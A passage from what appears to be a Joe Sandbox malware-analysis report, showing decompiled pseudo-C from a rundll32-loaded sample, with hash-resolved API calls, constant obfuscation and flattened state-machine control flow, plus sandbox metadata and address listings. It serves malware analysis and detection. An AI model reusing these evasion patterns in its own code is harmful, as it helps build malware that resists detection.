                                                                                                                      				signed int _v180;
                                                                                                                      				signed int _v184;
                                                                                                                      				signed int _v188;
                                                                                                                      				signed int _v192;
                                                                                                                      				signed int _v196;
                                                                                                                      				signed int _v200;
                                                                                                                      				signed int _v204;
                                                                                                                      				signed int _v208;
                                                                                                                      				signed int _v212;
                                                                                                                      				signed int _v216;
                                                                                                                      				unsigned int _v220;
                                                                                                                      				signed int _v224;
                                                                                                                      				signed int _v228;
                                                                                                                      				signed int _v232;
                                                                                                                      				void* _t233;
                                                                                                                      				void* _t246;
                                                                                                                      				intOrPtr _t251;
                                                                                                                      				intOrPtr* _t252;
                                                                                                                      				void* _t253;
                                                                                                                      				signed int _t276;
                                                                                                                      				signed int _t277;
                                                                                                                      				signed int _t278;
                                                                                                                      				signed int _t279;
                                                                                                                      				intOrPtr _t280;
                                                                                                                      				void* _t281;
                                                                                                                      				void* _t285;
                                                                                                                      				signed int* _t286;
                                                                                                                      
                                                                                                                      				_t252 = __ecx;
                                                                                                                      				_t286 =  &_v232;
                                                                                                                      				_v172 = __ecx;
                                                                                                                      				_v136 = _v136 & 0x00000000;
                                                                                                                      				_v132 = _v132 & 0x00000000;
                                                                                                                      				_v140 = 0x217d3d;
                                                                                                                      				_v176 = 0xa426f0;
                                                                                                                      				_v176 = _v176 + 0xffffeb7e;
                                                                                                                      				_v176 = _v176 ^ 0xed8cc375;
                                                                                                                      				_v176 = _v176 ^ 0xed273dc0;
                                                                                                                      				_v220 = 0x3129fd;
                                                                                                                      				_v220 = _v220 + 0xffff6602;
                                                                                                                      				_v220 = _v220 + 0xfffff7e7;
                                                                                                                      				_v220 = _v220 >> 7;
                                                                                                                      				_v220 = _v220 ^ 0x000cbf49;
                                                                                                                      				_v212 = 0x151fab;
                                                                                                                      				_v212 = _v212 + 0x7196;
                                                                                                                      				_v212 = _v212 + 0xffffb9ae;
                                                                                                                      				_v212 = _v212 * 0x34;
                                                                                                                      				_t281 = 0x42637f8;
                                                                                                                      				_v212 = _v212 ^ 0x045541a5;
                                                                                                                      				_v148 = 0x54413c;
                                                                                                                      				_v148 = _v148 << 5;
                                                                                                                      				_v148 = _v148 ^ 0x0a8ad6a3;
                                                                                                                      				_v180 = 0x7a2f9c;
                                                                                                                      				_t276 = 0x52;
                                                                                                                      				_v180 = _v180 / _t276;
                                                                                                                      				_t277 = 0x3b;
                                                                                                                      				_v180 = _v180 * 0x43;
                                                                                                                      				_v180 = _v180 ^ 0x006060ee;
                                                                                                                      				_v144 = 0xa6782c;
                                                                                                                      				_v144 = _v144 + 0x5cb5;
                                                                                                                      				_v144 = _v144 ^ 0x00a488c7;
                                                                                                                      				_v228 = 0xec9e27;
                                                                                                                      				_v228 = _v228 >> 0x10;
                                                                                                                      				_v228 = _v228 * 0x57;
                                                                                                                      				_v228 = _v228 * 0x1a;
                                                                                                                      				_v228 = _v228 ^ 0x00091e6b;
                                                                                                                      				_v164 = 0xea1f52;
                                                                                                                      				_v164 = _v164 >> 6;
                                                                                                                      				_v164 = _v164 ^ 0x000e8f9b;
                                                                                                                      				_v168 = 0xaa796a;
                                                                                                                      				_v168 = _v168 << 9;
                                                                                                                      				_v168 = _v168 << 1;
                                                                                                                      				_v168 = _v168 ^ 0xa9e52790;
                                                                                                                      				_v232 = 0xe004fa;
                                                                                                                      				_v232 = _v232 >> 1;
                                                                                                                      				_v232 = _v232 ^ 0x9f2834c7;
                                                                                                                      				_v232 = _v232 << 7;
                                                                                                                      				_v232 = _v232 ^ 0xac158818;
                                                                                                                      				_v152 = 0x480a21;
                                                                                                                      				_v152 = _v152 >> 0xa;
                                                                                                                      				_v152 = _v152 ^ 0x00051613;
                                                                                                                      				_v192 = 0xe4ba17;
                                                                                                                      				_v192 = _v192 << 0xc;
                                                                                                                      				_v192 = _v192 + 0xffffee51;
                                                                                                                      				_v192 = _v192 * 0x26;
                                                                                                                      				_v192 = _v192 ^ 0x39f6006f;
                                                                                                                      				_v184 = 0xc14080;
                                                                                                                      				_v184 = _v184 + 0xffffa387;
                                                                                                                      				_v184 = _v184 / _t277;
                                                                                                                      				_v184 = _v184 ^ 0x000e78de;
                                                                                                                      				_v224 = 0xaafc1b;
                                                                                                                      				_v224 = _v224 << 8;
                                                                                                                      				_v224 = _v224 | 0xe68448c7;
                                                                                                                      				_v224 = _v224 + 0xffffb5fa;
                                                                                                                      				_v224 = _v224 ^ 0xeef4be14;
                                                                                                                      				_v208 = 0x4cb450;
                                                                                                                      				_v208 = _v208 | 0x41a678b0;
                                                                                                                      				_v208 = _v208 << 3;
                                                                                                                      				_v208 = _v208 + 0xffff1daa;
                                                                                                                      				_v208 = _v208 ^ 0x0f7f4e1f;
                                                                                                                      				_v156 = 0xa14600;
                                                                                                                      				_v156 = _v156 | 0x4ac9cb75;
                                                                                                                      				_v156 = _v156 ^ 0x4ae3fffe;
                                                                                                                      				_v200 = 0x80f125;
                                                                                                                      				_v200 = _v200 >> 6;
                                                                                                                      				_v200 = _v200 + 0xa5;
                                                                                                                      				_v200 = _v200 + 0x7126;
                                                                                                                      				_v200 = _v200 ^ 0x0003bf81;
                                                                                                                      				_v216 = 0xe3f3ee;
                                                                                                                      				_v216 = _v216 ^ 0x7171deb4;
                                                                                                                      				_v216 = _v216 ^ 0xe1685078;
                                                                                                                      				_v216 = _v216 >> 0xf;
                                                                                                                      				_v216 = _v216 ^ 0x000d439d;
                                                                                                                      				_v188 = 0x120f5;
                                                                                                                      				_v188 = _v188 + 0x596b;
                                                                                                                      				_t152 =  &_v188; // 0x596b
                                                                                                                      				_t278 = 0x32;
                                                                                                                      				_v188 =  *_t152 * 0x15;
                                                                                                                      				_t251 = _v172;
                                                                                                                      				_v188 = _v188 / _t278;
                                                                                                                      				_v188 = _v188 ^ 0x0000a7a1;
                                                                                                                      				_v160 = 0xd711e5;
                                                                                                                      				_v160 = _v160 | 0x35682df8;
                                                                                                                      				_v160 = _v160 ^ 0x35f32f5b;
                                                                                                                      				_v196 = 0xd874e4;
                                                                                                                      				_t279 = 0x21;
                                                                                                                      				_t280 = _v172;
                                                                                                                      				_v196 = _v196 / _t279;
                                                                                                                      				_v196 = _v196 + 0xffffe729;
                                                                                                                      				_v196 = _v196 + 0xffff68b4;
                                                                                                                      				_v196 = _v196 ^ 0x0004b076;
                                                                                                                      				_v204 = 0xe57f56;
                                                                                                                      				_v204 = _v204 ^ 0xa54f8096;
                                                                                                                      				_v204 = _v204 + 0xc8c2;
                                                                                                                      				_v204 = _v204 + 0xffffef22;
                                                                                                                      				_v204 = _v204 ^ 0xa5a4489c;
                                                                                                                      				while(1) {
                                                                                                                      					L1:
                                                                                                                      					_t233 = 0xe70005f;
                                                                                                                      					do {
                                                                                                                      						while(_t281 != 0x42637f8) {
                                                                                                                      							if(_t281 == 0x44a4c11) {
                                                                                                                      								_t285 = E002BEF71(1, 0x10);
                                                                                                                      								_push(_t285);
                                                                                                                      								_push(_v148);
                                                                                                                      								_push( &_v128);
                                                                                                                      								_t253 = 0xb;
                                                                                                                      								E002B5A07(_t253, _v212);
                                                                                                                      								_t286 =  &(_t286[5]);
                                                                                                                      								_t281 = 0x5b07f93;
                                                                                                                      								goto L9;
                                                                                                                      							} else {
                                                                                                                      								if(_t281 == 0x5b07f93) {
                                                                                                                      									_t280 = E002CC9A9(_v144, _v228,  *_t252, _v164,  *((intOrPtr*)(_t252 + 4)));
                                                                                                                      									_t286 =  &(_t286[4]);
                                                                                                                      									__eflags = _t280;
                                                                                                                      									if(__eflags != 0) {
                                                                                                                      										_t281 = 0xc9ed25e;
                                                                                                                      										goto L9;
                                                                                                                      									}
                                                                                                                      								} else {
                                                                                                                      									if(_t281 == 0xc9ed25e) {
                                                                                                                      										_t285 = 0x4000;
                                                                                                                      										_push(_t252);
                                                                                                                      										_push(_t252);
                                                                                                                      										_t251 = E002C3512(0x4000);
                                                                                                                      										__eflags = _t251;
                                                                                                                      										_t233 = 0xe70005f;
                                                                                                                      										_t252 = _v172;
                                                                                                                      										_t281 =  !=  ? 0xe70005f : 0xdfcaecd;
                                                                                                                      										continue;
                                                                                                                      									} else {
                                                                                                                      										if(_t281 == 0xdfcaecd) {
                                                                                                                      											E002B68DE(_v188, _v160, _v196, _v204, _t280);
                                                                                                                      										} else {
                                                                                                                      											_t295 = _t281 - _t233;
                                                                                                                      											if(_t281 != _t233) {
                                                                                                                      												goto L15;
                                                                                                                      											} else {
                                                                                                                      												_push(_v208);
                                                                                                                      												_push(_v224);
                                                                                                                      												_push(0x2b136c);
                                                                                                                      												_t246 = E002BAB66(_v192, _v184, _t295);
                                                                                                                      												_push(_t280);
                                                                                                                      												_push( &_v128);
                                                                                                                      												_push(_t246);
                                                                                                                      												_push(_t285);
                                                                                                                      												_push(_t251);
                                                                                                                      												 *((intOrPtr*)(E002BC1DC(_v192, 0xbf7d08b0, 0xef)))();
                                                                                                                      												E002BAE03(_v156, _v200, _v216, _t246);
                                                                                                                      												_t286 =  &(_t286[0xa]);
                                                                                                                      												_t281 = 0xdfcaecd;
                                                                                                                      												L9:
                                                                                                                      												_t252 = _v172;
                                                                                                                      												goto L1;
                                                                                                                      											}
                                                                                                                      										}
                                                                                                                      									}
                                                                                                                      								}
                                                                                                                      							}
                                                                                                                      							L18:
                                                                                                                      							return _t251;
                                                                                                                      						}
                                                                                                                      						_t281 = 0x44a4c11;
                                                                                                                      						L15:
                                                                                                                      						__eflags = _t281 - 0xefc9c40;
                                                                                                                      					} while (__eflags != 0);
                                                                                                                      					goto L18;
                                                                                                                      				}
                                                                                                                      			}











































                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443285949.00000000002B1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443281134.00000000002B0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443300447.00000000002D5000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_2b0000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: !H$&q$<AT$=}!$kYo$o$xPh$``
                                                                                                                      • API String ID: 0-1374268856
                                                                                                                      • Opcode ID: fda34d55eadfb4ee5d40964cd032e3d970c2dc1411e8d8896079fb0560461940
                                                                                                                      • Instruction ID: 3dbed4beb3c364003d9113209a02bd915339863cc6a4e09ec7800d7a36c2229a
                                                                                                                      • Opcode Fuzzy Hash: fda34d55eadfb4ee5d40964cd032e3d970c2dc1411e8d8896079fb0560461940
                                                                                                                      • Instruction Fuzzy Hash: 09B140B24183819FD354CF29C48AA0BFBF0BBD4758F104A2DF5A696260D7B5D949CF82
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 92%
                                                                                                                      			E002CA429(void* __ecx) {
                                                                                                                      				char _v520;
                                                                                                                      				char _v1040;
                                                                                                                      				char _v1560;
                                                                                                                      				char _v2080;
                                                                                                                      				char _v2600;
                                                                                                                      				signed int _v2604;
                                                                                                                      				intOrPtr _v2608;
                                                                                                                      				intOrPtr _v2612;
                                                                                                                      				intOrPtr _v2616;
                                                                                                                      				signed int _v2620;
                                                                                                                      				signed int _v2624;
                                                                                                                      				signed int _v2628;
                                                                                                                      				signed int _v2632;
                                                                                                                      				signed int _v2636;
                                                                                                                      				signed int _v2640;
                                                                                                                      				signed int _v2644;
                                                                                                                      				signed int _v2648;
                                                                                                                      				signed int _v2652;
                                                                                                                      				signed int _v2656;
                                                                                                                      				signed int _v2660;
                                                                                                                      				signed int _v2664;
                                                                                                                      				signed int _v2668;
                                                                                                                      				signed int _v2672;
                                                                                                                      				signed int _v2676;
                                                                                                                      				signed int _v2680;
                                                                                                                      				signed int _v2684;
                                                                                                                      				signed int _v2688;
                                                                                                                      				signed int _v2692;
                                                                                                                      				signed int _v2696;
                                                                                                                      				signed int _v2700;
                                                                                                                      				signed int _v2704;
                                                                                                                      				signed int _v2708;
                                                                                                                      				signed int _v2712;
                                                                                                                      				signed int _v2716;
                                                                                                                      				signed int _v2720;
                                                                                                                      				signed int _v2724;
                                                                                                                      				signed int _v2728;
                                                                                                                      				signed int _v2732;
                                                                                                                      				signed int _v2736;
                                                                                                                      				signed int _v2740;
                                                                                                                      				signed int _v2744;
                                                                                                                      				signed int _v2748;
                                                                                                                      				signed int _v2752;
                                                                                                                      				signed int _v2756;
                                                                                                                      				signed int _v2760;
                                                                                                                      				signed int _v2764;
                                                                                                                      				signed int _v2768;
                                                                                                                      				signed int _v2772;
                                                                                                                      				signed int _v2776;
                                                                                                                      				signed int _v2780;
                                                                                                                      				signed int _v2784;
                                                                                                                      				signed int _v2788;
                                                                                                                      				signed int _v2792;
                                                                                                                      				signed int _t471;
                                                                                                                      				signed int _t488;
                                                                                                                      				signed int _t491;
                                                                                                                      				signed int _t492;
                                                                                                                      				signed int _t493;
                                                                                                                      				signed int _t494;
                                                                                                                      				signed int _t495;
                                                                                                                      				signed int _t496;
                                                                                                                      				signed int _t497;
                                                                                                                      				signed int _t498;
                                                                                                                      				signed int _t499;
                                                                                                                      				signed int _t500;
                                                                                                                      				signed int _t503;
                                                                                                                      				void* _t552;
                                                                                                                      				void* _t553;
                                                                                                                      				signed int _t556;
                                                                                                                      				signed int* _t558;
                                                                                                                      
                                                                                                                      				_t558 =  &_v2792;
                                                                                                                      				_v2604 = _v2604 & 0x00000000;
                                                                                                                      				_v2616 = 0xa4b63e;
                                                                                                                      				_v2612 = 0x1047f0;
                                                                                                                      				_v2608 = 0x380de4;
                                                                                                                      				_v2640 = 0x3665dd;
                                                                                                                      				_v2640 = _v2640 >> 1;
                                                                                                                      				_v2640 = _v2640 ^ 0x001b32c7;
                                                                                                                      				_v2748 = 0xd91e11;
                                                                                                                      				_v2748 = _v2748 + 0xffffc541;
                                                                                                                      				_v2748 = _v2748 ^ 0x51c605c4;
                                                                                                                      				_v2748 = _v2748 ^ 0x6a8dd901;
                                                                                                                      				_v2748 = _v2748 ^ 0x3b9e7a9b;
                                                                                                                      				_v2788 = 0x157b94;
                                                                                                                      				_v2788 = _v2788 + 0xffffeadc;
                                                                                                                      				_v2788 = _v2788 >> 0x10;
                                                                                                                      				_v2788 = _v2788 + 0xffff73d6;
                                                                                                                      				_v2788 = _v2788 ^ 0xffff2eba;
                                                                                                                      				_v2716 = 0x64154b;
                                                                                                                      				_v2716 = _v2716 * 0x75;
                                                                                                                      				_t552 = __ecx;
                                                                                                                      				_v2716 = _v2716 << 3;
                                                                                                                      				_t553 = 0x422d362;
                                                                                                                      				_v2716 = _v2716 ^ 0x6de46b99;
                                                                                                                      				_v2720 = 0x9c58cd;
                                                                                                                      				_v2720 = _v2720 + 0xffff09d2;
                                                                                                                      				_v2720 = _v2720 + 0x2545;
                                                                                                                      				_v2720 = _v2720 ^ 0x00913431;
                                                                                                                      				_v2688 = 0xaeb597;
                                                                                                                      				_v2688 = _v2688 ^ 0x90c85188;
                                                                                                                      				_t556 = 0x69;
                                                                                                                      				_v2688 = _v2688 / _t556;
                                                                                                                      				_v2688 = _v2688 ^ 0x016f083f;
                                                                                                                      				_v2624 = 0xf336a7;
                                                                                                                      				_v2624 = _v2624 ^ 0x0756d720;
                                                                                                                      				_v2624 = _v2624 ^ 0x07af532c;
                                                                                                                      				_v2780 = 0x2eb910;
                                                                                                                      				_v2780 = _v2780 + 0xffff6a34;
                                                                                                                      				_v2780 = _v2780 + 0x3a3b;
                                                                                                                      				_v2780 = _v2780 >> 0xc;
                                                                                                                      				_v2780 = _v2780 ^ 0x00093eda;
                                                                                                                      				_v2696 = 0x95c01d;
                                                                                                                      				_v2696 = _v2696 ^ 0xd4af9b47;
                                                                                                                      				_t488 = 0x43;
                                                                                                                      				_v2696 = _v2696 * 0x38;
                                                                                                                      				_v2696 = _v2696 ^ 0x6cc3512a;
                                                                                                                      				_v2756 = 0x7bda8f;
                                                                                                                      				_v2756 = _v2756 >> 4;
                                                                                                                      				_v2756 = _v2756 + 0xffff790e;
                                                                                                                      				_v2756 = _v2756 << 1;
                                                                                                                      				_v2756 = _v2756 ^ 0x00077f92;
                                                                                                                      				_v2672 = 0xbe500a;
                                                                                                                      				_v2672 = _v2672 * 0x69;
                                                                                                                      				_v2672 = _v2672 ^ 0x4e081773;
                                                                                                                      				_v2664 = 0xf21545;
                                                                                                                      				_v2664 = _v2664 << 1;
                                                                                                                      				_v2664 = _v2664 ^ 0x01e0a5ee;
                                                                                                                      				_v2712 = 0x4aa3d0;
                                                                                                                      				_v2712 = _v2712 / _t488;
                                                                                                                      				_v2712 = _v2712 + 0xffffba00;
                                                                                                                      				_v2712 = _v2712 ^ 0x00096837;
                                                                                                                      				_v2704 = 0x6e8851;
                                                                                                                      				_v2704 = _v2704 * 0x4c;
                                                                                                                      				_v2704 = _v2704 ^ 0x74892048;
                                                                                                                      				_v2704 = _v2704 ^ 0x54501412;
                                                                                                                      				_v2740 = 0x9704ff;
                                                                                                                      				_t491 = 0x4c;
                                                                                                                      				_v2740 = _v2740 / _t491;
                                                                                                                      				_v2740 = _v2740 + 0xffff50cb;
                                                                                                                      				_v2740 = _v2740 / _t556;
                                                                                                                      				_v2740 = _v2740 ^ 0x0004486b;
                                                                                                                      				_v2772 = 0xa165e2;
                                                                                                                      				_t492 = 0x36;
                                                                                                                      				_v2772 = _v2772 / _t492;
                                                                                                                      				_v2772 = _v2772 ^ 0x6089554b;
                                                                                                                      				_t493 = 0x29;
                                                                                                                      				_v2772 = _v2772 * 0x30;
                                                                                                                      				_v2772 = _v2772 ^ 0x1a2b5067;
                                                                                                                      				_v2680 = 0xe9519d;
                                                                                                                      				_v2680 = _v2680 / _t493;
                                                                                                                      				_v2680 = _v2680 | 0xd8f73a5a;
                                                                                                                      				_v2680 = _v2680 ^ 0xd8f0b3ca;
                                                                                                                      				_v2656 = 0x3fe983;
                                                                                                                      				_t494 = 0x30;
                                                                                                                      				_v2656 = _v2656 / _t494;
                                                                                                                      				_v2656 = _v2656 ^ 0x00046ac2;
                                                                                                                      				_v2628 = 0x33b4cd;
                                                                                                                      				_t495 = 0x11;
                                                                                                                      				_v2628 = _v2628 / _t495;
                                                                                                                      				_v2628 = _v2628 ^ 0x00043067;
                                                                                                                      				_v2648 = 0x47920b;
                                                                                                                      				_t496 = 0x1a;
                                                                                                                      				_v2648 = _v2648 * 7;
                                                                                                                      				_v2648 = _v2648 ^ 0x01f55662;
                                                                                                                      				_v2636 = 0xc27dad;
                                                                                                                      				_v2636 = _v2636 | 0xeea2905e;
                                                                                                                      				_v2636 = _v2636 ^ 0xeee70f52;
                                                                                                                      				_v2792 = 0xce83a7;
                                                                                                                      				_v2792 = _v2792 | 0x91097b86;
                                                                                                                      				_v2792 = _v2792 >> 0x10;
                                                                                                                      				_v2792 = _v2792 + 0xfffff873;
                                                                                                                      				_v2792 = _v2792 ^ 0x000d88b9;
                                                                                                                      				_v2764 = 0x687458;
                                                                                                                      				_v2764 = _v2764 + 0xffff3130;
                                                                                                                      				_v2764 = _v2764 / _t488;
                                                                                                                      				_v2764 = _v2764 | 0xf90624cd;
                                                                                                                      				_v2764 = _v2764 ^ 0xf90653f7;
                                                                                                                      				_v2784 = 0xf92951;
                                                                                                                      				_v2784 = _v2784 + 0xffff51be;
                                                                                                                      				_v2784 = _v2784 ^ 0x8ae9764d;
                                                                                                                      				_v2784 = _v2784 + 0x99a0;
                                                                                                                      				_v2784 = _v2784 ^ 0x8a16d001;
                                                                                                                      				_v2732 = 0xd5993f;
                                                                                                                      				_v2732 = _v2732 / _t496;
                                                                                                                      				_v2732 = _v2732 + 0xffff4990;
                                                                                                                      				_v2732 = _v2732 ^ 0x000978e2;
                                                                                                                      				_v2724 = 0xcf1521;
                                                                                                                      				_v2724 = _v2724 >> 2;
                                                                                                                      				_v2724 = _v2724 << 0xa;
                                                                                                                      				_v2724 = _v2724 ^ 0xcf1adb57;
                                                                                                                      				_v2728 = 0xc9d07f;
                                                                                                                      				_v2728 = _v2728 + 0xffff241f;
                                                                                                                      				_v2728 = _v2728 + 0xffff5e1a;
                                                                                                                      				_v2728 = _v2728 ^ 0x00c03f16;
                                                                                                                      				_v2632 = 0x51b7a0;
                                                                                                                      				_t497 = 0xd;
                                                                                                                      				_v2632 = _v2632 / _t497;
                                                                                                                      				_v2632 = _v2632 ^ 0x0003c006;
                                                                                                                      				_v2768 = 0xdee1c4;
                                                                                                                      				_t498 = 0x72;
                                                                                                                      				_v2768 = _v2768 * 0x4b;
                                                                                                                      				_v2768 = _v2768 ^ 0x45bd8e4b;
                                                                                                                      				_v2768 = _v2768 + 0x810;
                                                                                                                      				_v2768 = _v2768 ^ 0x04f5c4f4;
                                                                                                                      				_v2620 = 0x673f5;
                                                                                                                      				_v2620 = _v2620 / _t498;
                                                                                                                      				_v2620 = _v2620 ^ 0x0006a8dc;
                                                                                                                      				_v2776 = 0xc1ae10;
                                                                                                                      				_t499 = 0x5a;
                                                                                                                      				_v2776 = _v2776 * 0x5d;
                                                                                                                      				_v2776 = _v2776 / _t499;
                                                                                                                      				_t500 = 0x7a;
                                                                                                                      				_v2776 = _v2776 / _t500;
                                                                                                                      				_v2776 = _v2776 ^ 0x0000f358;
                                                                                                                      				_v2668 = 0x9bfbd0;
                                                                                                                      				_v2668 = _v2668 * 0x2e;
                                                                                                                      				_v2668 = _v2668 ^ 0x1c042184;
                                                                                                                      				_v2700 = 0xcd0c2b;
                                                                                                                      				_v2700 = _v2700 >> 8;
                                                                                                                      				_v2700 = _v2700 + 0xfffff064;
                                                                                                                      				_v2700 = _v2700 ^ 0x0007642a;
                                                                                                                      				_v2708 = 0x1a6cb4;
                                                                                                                      				_v2708 = _v2708 ^ 0x57f593cf;
                                                                                                                      				_v2708 = _v2708 | 0x44881231;
                                                                                                                      				_v2708 = _v2708 ^ 0x57eba098;
                                                                                                                      				_v2752 = 0xd7110a;
                                                                                                                      				_v2752 = _v2752 / _t556;
                                                                                                                      				_v2752 = _v2752 << 0xe;
                                                                                                                      				_v2752 = _v2752 + 0xffff1365;
                                                                                                                      				_v2752 = _v2752 ^ 0x83185000;
                                                                                                                      				_v2760 = 0xc45920;
                                                                                                                      				_v2760 = _v2760 + 0xffffdf34;
                                                                                                                      				_v2760 = _v2760 >> 0x10;
                                                                                                                      				_v2760 = _v2760 + 0xfa48;
                                                                                                                      				_v2760 = _v2760 ^ 0x00031526;
                                                                                                                      				_v2652 = 0x3af3c9;
                                                                                                                      				_v2652 = _v2652 << 0xf;
                                                                                                                      				_v2652 = _v2652 ^ 0x79efd05d;
                                                                                                                      				_v2660 = 0x38b4f1;
                                                                                                                      				_v2660 = _v2660 ^ 0x7076ccd1;
                                                                                                                      				_v2660 = _v2660 ^ 0x704b934c;
                                                                                                                      				_v2744 = 0x6269bc;
                                                                                                                      				_v2744 = _v2744 | 0xfa5eccfb;
                                                                                                                      				_v2744 = _v2744 * 0x5f;
                                                                                                                      				_v2744 = _v2744 << 0xe;
                                                                                                                      				_v2744 = _v2744 ^ 0x9469f4ee;
                                                                                                                      				_v2676 = 0x941055;
                                                                                                                      				_v2676 = _v2676 | 0xfd7f72ef;
                                                                                                                      				_v2676 = _v2676 ^ 0xfdfef17e;
                                                                                                                      				_v2684 = 0x7199f;
                                                                                                                      				_v2684 = _v2684 + 0x9aa9;
                                                                                                                      				_v2684 = _v2684 << 0xe;
                                                                                                                      				_v2684 = _v2684 ^ 0xed16f6de;
                                                                                                                      				_v2644 = 0xf4560;
                                                                                                                      				_v2644 = _v2644 * 0x1c;
                                                                                                                      				_v2644 = _v2644 ^ 0x01a06f93;
                                                                                                                      				_v2692 = 0x891e84;
                                                                                                                      				_v2692 = _v2692 ^ 0x46454346;
                                                                                                                      				_v2692 = _v2692 | 0x068a2534;
                                                                                                                      				_v2692 = _v2692 ^ 0x46ca9877;
                                                                                                                      				_v2736 = 0x29dfc8;
                                                                                                                      				_t471 = _v2736 * 0x19;
                                                                                                                      				_v2736 = _t471;
                                                                                                                      				_v2736 = _v2736 | 0x3d4578d3;
                                                                                                                      				_v2736 = _v2736 >> 4;
                                                                                                                      				_v2736 = _v2736 ^ 0x03d45238;
                                                                                                                      				while(_t553 != 0x2953b22) {
                                                                                                                      					if(_t553 == 0x422d362) {
                                                                                                                      						_t553 = 0xe704baa;
                                                                                                                      						continue;
                                                                                                                      					} else {
                                                                                                                      						_t565 = _t553 - 0xe704baa;
                                                                                                                      						if(_t553 != 0xe704baa) {
                                                                                                                      							L8:
                                                                                                                      							__eflags = _t553 - 0x740d40c;
                                                                                                                      							if(__eflags != 0) {
                                                                                                                      								continue;
                                                                                                                      							}
                                                                                                                      						} else {
                                                                                                                      							E002D12A8(_t500, _v2748, _t565, _v2788, _v2716,  &_v2600);
                                                                                                                      							 *((short*)(E002C4FA8(_v2720,  &_v2600, _v2688, _v2624))) = 0;
                                                                                                                      							E002B8650(_v2780,  &_v1560, _t565, _v2696);
                                                                                                                      							_push(_v2712);
                                                                                                                      							_push(_v2664);
                                                                                                                      							_push(0x2b181c);
                                                                                                                      							E002BE7CE(E002BAB66(_v2756, _v2672, _t565), _t565, _v2704,  &_v2600, _v2756, _v2740, _v2772, _v2680, _v2656,  &_v1560);
                                                                                                                      							E002BAE03(_v2628, _v2648, _v2636, _t483);
                                                                                                                      							_t500 = _v2792;
                                                                                                                      							_t471 = E002CC38F(_t500,  &_v2080, _t552, _v2764);
                                                                                                                      							_t558 =  &(_t558[0x15]);
                                                                                                                      							if(_t471 != 0) {
                                                                                                                      								_t553 = 0x2953b22;
                                                                                                                      								continue;
                                                                                                                      							}
                                                                                                                      						}
                                                                                                                      					}
                                                                                                                      					return _t471;
                                                                                                                      				}
                                                                                                                      				_push(_t500);
                                                                                                                      				E002BEA7B( &_v1040, _v2784, _v2640, _t500, _v2732, _v2724, _v2728);
                                                                                                                      				_push(_v2776);
                                                                                                                      				_push(_v2620);
                                                                                                                      				_push(0x2b185c);
                                                                                                                      				E002BE7CE(E002BAB66(_v2632, _v2768, __eflags), __eflags, _v2668,  &_v1040, _v2632, _v2700, _v2708, _v2752, _v2760,  &_v2080);
                                                                                                                      				_t503 = _v2652;
                                                                                                                      				E002BAE03(_t503, _v2660, _v2744, _t473);
                                                                                                                      				__eflags = 0;
                                                                                                                      				_push(_v2736);
                                                                                                                      				_push(_v2692);
                                                                                                                      				_push(_v2644);
                                                                                                                      				_push(0);
                                                                                                                      				_push(0);
                                                                                                                      				_push(_v2684);
                                                                                                                      				_push(_t503);
                                                                                                                      				_push(0);
                                                                                                                      				_t500 =  &_v520;
                                                                                                                      				_t471 = E002B9700(_t500, _v2676, 0);
                                                                                                                      				_t558 =  &(_t558[0x1c]);
                                                                                                                      				_t553 = 0x740d40c;
                                                                                                                      				goto L8;
                                                                                                                      			}
                                                                                                                      0x002ca984
                                                                                                                      0x002ca98c
                                                                                                                      0x002ca994
                                                                                                                      0x002ca99c
                                                                                                                      0x002ca9a4
                                                                                                                      0x002ca9a9
                                                                                                                      0x002ca9b1
                                                                                                                      0x002ca9b9
                                                                                                                      0x002ca9c4
                                                                                                                      0x002ca9cc
                                                                                                                      0x002ca9d7
                                                                                                                      0x002ca9e2
                                                                                                                      0x002ca9ed
                                                                                                                      0x002ca9f8
                                                                                                                      0x002caa00
                                                                                                                      0x002caa0d
                                                                                                                      0x002caa16
                                                                                                                      0x002caa20
                                                                                                                      0x002caa28
                                                                                                                      0x002caa33
                                                                                                                      0x002caa3e
                                                                                                                      0x002caa49
                                                                                                                      0x002caa51
                                                                                                                      0x002caa59
                                                                                                                      0x002caa5e
                                                                                                                      0x002caa66
                                                                                                                      0x002caa79
                                                                                                                      0x002caa80
                                                                                                                      0x002caa8b
                                                                                                                      0x002caa93
                                                                                                                      0x002caa9b
                                                                                                                      0x002caaa3
                                                                                                                      0x002caaab
                                                                                                                      0x002caab3
                                                                                                                      0x002caab8
                                                                                                                      0x002caabc
                                                                                                                      0x002caac4
                                                                                                                      0x002caac9
                                                                                                                      0x002caad1
                                                                                                                      0x002caadf
                                                                                                                      0x002cabe3
                                                                                                                      0x00000000
                                                                                                                      0x002caae5
                                                                                                                      0x002caae5
                                                                                                                      0x002caae7
                                                                                                                      0x002cacbc
                                                                                                                      0x002cacbc
                                                                                                                      0x002cacc2
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x002caaed
                                                                                                                      0x002cab01
                                                                                                                      0x002cab34
                                                                                                                      0x002cab3b
                                                                                                                      0x002cab40
                                                                                                                      0x002cab44
                                                                                                                      0x002cab56
                                                                                                                      0x002cab9c
                                                                                                                      0x002cabb7
                                                                                                                      0x002cabc0
                                                                                                                      0x002cabcc
                                                                                                                      0x002cabd1
                                                                                                                      0x002cabd6
                                                                                                                      0x002cabdc
                                                                                                                      0x00000000
                                                                                                                      0x002cabdc
                                                                                                                      0x002cabd6
                                                                                                                      0x002caae7
                                                                                                                      0x002cacd2
                                                                                                                      0x002cacd2
                                                                                                                      0x002cabea
                                                                                                                      0x002cac0a
                                                                                                                      0x002cac0f
                                                                                                                      0x002cac13
                                                                                                                      0x002cac25
                                                                                                                      0x002cac65
                                                                                                                      0x002cac76
                                                                                                                      0x002cac7d
                                                                                                                      0x002cac85
                                                                                                                      0x002cac87
                                                                                                                      0x002cac8b
                                                                                                                      0x002cac8f
                                                                                                                      0x002cac96
                                                                                                                      0x002cac97
                                                                                                                      0x002cac98
                                                                                                                      0x002caca6
                                                                                                                      0x002caca7
                                                                                                                      0x002caca8
                                                                                                                      0x002cacaf
                                                                                                                      0x002cacb4
                                                                                                                      0x002cacb7
                                                                                                                      0x00000000

